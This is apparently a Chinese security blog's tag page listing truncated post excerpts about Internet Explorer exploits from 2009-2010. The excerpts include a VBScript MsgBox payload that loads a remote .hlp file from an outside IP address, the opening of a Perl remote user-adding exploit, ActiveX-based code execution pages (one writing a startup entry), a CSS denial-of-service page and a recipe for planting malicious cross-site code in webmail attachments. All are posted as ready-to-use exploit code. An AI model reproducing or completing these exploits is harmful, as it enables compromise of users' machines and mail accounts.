含有 IE 标签的文章

Internet Explorer的’winhlp32.exe中’MsgBox()’远程执行代码漏洞

date 2010年03月03日 | category 工具收集

测试代码: <html> <script type="text/vbscript"> big = "\\184.73.14.110\PUBLIC\test.hlp" //For i=1 to 2500 //  big = big & "\..\" //Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, ReadMore

IE6/7远程执行代码(远程添加用户漏洞)

date 2010年02月24日 | category 学习笔记, 工具收集

利用代码: #!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008                           8                      \n"; print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n"; print "8eeeee ReadMore

发一个网摘网站的IE右键功能的源码

date 2010年02月02日 | category 学习笔记

今天朋友让帮他搞一个IE右键菜单功能快捷入口,一开始研究了半天资料还意为很神奇呢,不过后来发现原来是这么的简单代码如下: 安装文件 代码: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Internet ReadMore

又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)

date 2010年01月19日 | category 工具收集

这段代码在SP3+IE6下测试成功 测试代码: <html> <p align="left"><b><font face="Segoe Script" ReadMore

传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法))

date 2010年01月19日 | category 工具收集

这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果! 测试代码: <html>   <object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object> <script language='vbscript'>   targetFile ReadMore

Internet Explorer 6/7 CSS Handling Denial of Service

date 2009年11月24日 | category 工具收集

IE6/7 CSS 处理拒绝服务 利用代码: <!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML ReadMore

网易邮箱最新跨站挂马漏洞

date 2009年10月15日 | category 学习笔记

该漏洞的原理请参考http://snight.org/217.snt 利用方法:在发邮件的时候插入含有跨站和挂马代码的TXT文档就可以了 当对方接收到邮件并点击附件的时候触发此漏洞 漏洞效果   ReadMore